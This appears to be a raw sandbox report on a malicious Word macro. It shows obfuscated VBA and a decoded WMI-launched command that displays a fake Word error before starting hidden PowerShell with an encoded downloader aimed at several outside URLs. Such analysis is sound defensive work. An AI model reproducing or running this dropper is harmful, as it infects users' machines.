[ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bMAx [ sh bWQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAFx [ sh bQAx [ sh bZQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBjx [ sh bAHx [ sh bQAx [ sh bTwx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBtx [ sh bACx [ sh b4Ax [ sh bSQx [ sh bBvx [ sh bACx [ sh b4Ax [ sh bRAx [ sh bBJx [ sh bACx [ sh bcAx [ sh bKQx [ sh bAgx [ sh bACx [ sh bkAx [ sh bOwx [ sh bAgx [ sh bACx [ sh bAAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bMAx [ sh bRQx [ sh bB0x [ sh bACx [ sh bAAx [ sh bIAx [ sh bA0x [ sh bADx [ sh bIAx [ sh bOAx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bBZx [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bcAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bYAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bgAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh b0Ax [ sh bZgx [ sh bAnx [ sh bAEx [ sh bUAx [ sh bTQx [ sh bAux [ sh bAGx [ sh b4Ax [ sh bRQx [ sh bBUx [ sh bACx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bZQx [ sh bByx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAHx [ sh bQAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bUwx [ sh bBZx [ sh bAHx [ sh bMAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bTQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAEx [ sh bUAx [ sh bUgx [ sh bBWx [ sh bAGx [ sh bkAx [ sh bQwx [ sh bBFx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bAAx [ sh bbwx [ sh bBJx [ sh bAEx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bdAx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBhx [ sh bAEx [ sh b4Ax [ sh bYQx [ sh bBnx [ sh bACx [ sh bcAx [ sh bKQx [ sh bApx [ sh bACx ) -> 27204

                                                        executed
                                                        195

                                                        nnjasd = K532dwnyk0pybrc(njcnja)

                                                        196

                                                        Goto OgZqDzXrC

                                                        197

                                                        Set FSWADGB = SlFMhE

                                                        SlFMhE

                                                        198

                                                        Dim fWUcJcE, bDqBloVC, OZDOK as Long

                                                        199

                                                        Dim JRtnBYH as Word.Paragraph

                                                        200

                                                        Dim pXRdBD() as Byte

                                                        201

                                                        For Each JRtnBYH in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        202

                                                        pXRdBD = JRtnBYH.Range

                                                        Range

                                                        203

                                                        dscc = "sadsaccc" & JRtnBYH.Range

                                                        Range

                                                        204

                                                        bDqBloVC = UBound(pXRdBD) - 1

                                                        UBound

                                                        205

                                                        fWUcJcE = 0

                                                        206

                                                        Set axZmGGE = TtNYEBE

                                                        TtNYEBE

                                                        207

                                                        Do Until bDqBloVC > bDqBloVC

                                                        208

                                                        If pXRdBD(bDqBloVC) = 46 Or bDqBloVC = bDqBloVC Then

                                                        209

                                                        dscc = "sasdsacc" & (fWUcJcE / 2) + 1 & " to " & (bDqBloVC / 2) + 1 & MidB$(pXRdBD, fWUcJcE + 1, bDqBloVC - fWUcJcE + 3)

                                                        MidB$

                                                        210

                                                        fWUcJcE = bDqBloVC + 2

                                                        211

                                                        Endif

                                                        212

                                                        bDqBloVC = bDqBloVC + 2

                                                        213

                                                        Loop

                                                        214

                                                        Next

                                                        Paragraphs

                                                        214

                                                        OgZqDzXrC:

                                                        216

                                                        V5rp8m_1bqwi1poyk.Create nnjasd, Koy_r2oxzs1, X2yj58n39t50co

                                                        SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwA,,) -> 0

                                                        Koy_r2oxzs1

                                                        X2yj58n39t50co

                                                        executed
                                                        217

                                                        Goto ScLedvBEA

                                                        218

                                                        Set yktdUg = kxpwbBJF

                                                        kxpwbBJF

                                                        219

                                                        Dim wEvDIdG, lqbmGD, elJkJIB as Long

                                                        220

                                                        Dim IVjOAGZe as Word.Paragraph

                                                        221

                                                        Dim FcotIf() as Byte

                                                        222

                                                        For Each IVjOAGZe in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        223

                                                        FcotIf = IVjOAGZe.Range

                                                        Range

                                                        224

                                                        dscc = "sadsaccc" & IVjOAGZe.Range

                                                        Range

                                                        225

                                                        lqbmGD = UBound(FcotIf) - 1

                                                        UBound

                                                        226

                                                        wEvDIdG = 0

                                                        227

                                                        Set sJtmJ = UYxXOcIJG

                                                        UYxXOcIJG

                                                        228

                                                        Do Until lqbmGD > lqbmGD

                                                        229

                                                        If FcotIf(lqbmGD) = 46 Or lqbmGD = lqbmGD Then

                                                        230

                                                        dscc = "sasdsacc" & (wEvDIdG / 2) + 1 & " to " & (lqbmGD / 2) + 1 & MidB$(FcotIf, wEvDIdG + 1, lqbmGD - wEvDIdG + 3)

                                                        MidB$

                                                        231

                                                        wEvDIdG = lqbmGD + 2

                                                        232

                                                        Endif

                                                        233

                                                        lqbmGD = lqbmGD + 2

                                                        234

                                                        Loop

                                                        235

                                                        Next

                                                        Paragraphs

                                                        235

                                                        ScLedvBEA:

                                                        237

                                                        End Function

                                                        APIsMeta Information

                                                        JltZHC

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        hbrLsIIaJ

                                                        MidB$

                                                        iyOuxJbS

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        vcpiDgaED

                                                        MidB$

                                                        TVnICGBMg

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        HoDns

                                                        MidB$

                                                        Replace

                                                        Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process Replace("x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAx [ sh bBTx [ sh bAGx [ sh bUAx [ sh bVAx [ sh bAtx [ sh bAHx [ sh bYAx [ sh bQQx [ sh bBSx [ sh bAGx [ sh bkAx [ sh bYQx [ sh bBCx [ sh bAEx [ sh bwAx [ sh bZQx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIgx [ sh bBUx [ sh bADx [ sh bQAx [ sh bIgx [ sh bArx [ sh bACx [ sh bIAx [ sh bSwx [ sh bBkx [ sh bADx [ sh bYAx [ sh bIgx [ sh bApx [ sh bACx [ sh bAAx [ sh bKAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bB5x [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh bAAx [ sh bLQx [ sh bBGx [ sh bACx [ sh bAAx [ sh bJwx [ sh bByx [ sh bAGx [ sh bUAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bcgx [ sh bBZx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bMAx [ sh bWQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAFx [ sh bQAx [ sh bZQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBjx [ sh bAHx [ sh bQAx [ sh bTwx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBtx [ sh bACx [ sh b4Ax [ sh bSQx [ sh bBvx [ sh bACx [ sh b4Ax [ sh bRAx [ sh bBJx [ sh bACx [ sh bcAx [ sh bKQx [ sh bAgx [ sh bACx [ sh bkAx [ sh bOwx [ sh bAgx [ sh bACx [ sh bAAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bMAx [ sh bRQx [ sh bB0x [ sh bACx [ sh bAAx [ sh bIAx [ sh bA0x [ sh bADx [ sh bIAx [ sh bOAx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bBZx [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bcAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bYAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bgAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh b0Ax [ sh bZgx [ sh bAnx [ sh bAEx [ sh bUAx [ sh bTQx [ sh bAux [ sh bAGx [ sh b4Ax [ sh bRQx [ sh bBUx [ sh bACx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bZQx [ sh bByx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAHx [ sh bQAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bUwx [ sh bBZx [ sh bAHx [ sh bMAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bTQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAEx [ sh bUAx [ sh bUgx [ sh bBWx [ sh bAGx [ sh bkAx [ sh bQwx [ sh bBFx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bAAx [ sh bbwx [ sh bBJx [ sh bAEx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bdAx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBhx [ sh bAEx [ sh b4Ax [ sh bYQx [ sh bBnx [ sh bACx [ sh bcAx [ sh bKQx [ sh bApx [ sh bACx [ s,"x [ sh b",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwAr

                                                        Zi0fdg4qf12t

                                                        ElQBeG

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        xhcZSBIH

                                                        MidB$

                                                        fPExO

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        obcJwDFA

                                                        MidB$

                                                        FVoXJ

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        ZGOfHDFZ

                                                        MidB$

                                                        StringsDecrypted Strings
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "x [ sh b"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        LineInstructionMeta Information
                                                        324

                                                        Function Yw0lmj9uz2sfz0(Vld8aalp9dc)

                                                        325

                                                        Goto nhgrV

                                                        executed
                                                        326

                                                        Set nfGGCgIdG = JltZHC

                                                        JltZHC

                                                        327

                                                        Dim cxvFCyK, lTApi, gLahNHF as Long

                                                        328

                                                        Dim ooYfBGDHB as Word.Paragraph

                                                        329

                                                        Dim hVgaFGj() as Byte

                                                        330

                                                        For Each ooYfBGDHB in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        331

                                                        hVgaFGj = ooYfBGDHB.Range

                                                        Range

                                                        332

                                                        dscc = "sadsaccc" & ooYfBGDHB.Range

                                                        Range

                                                        333

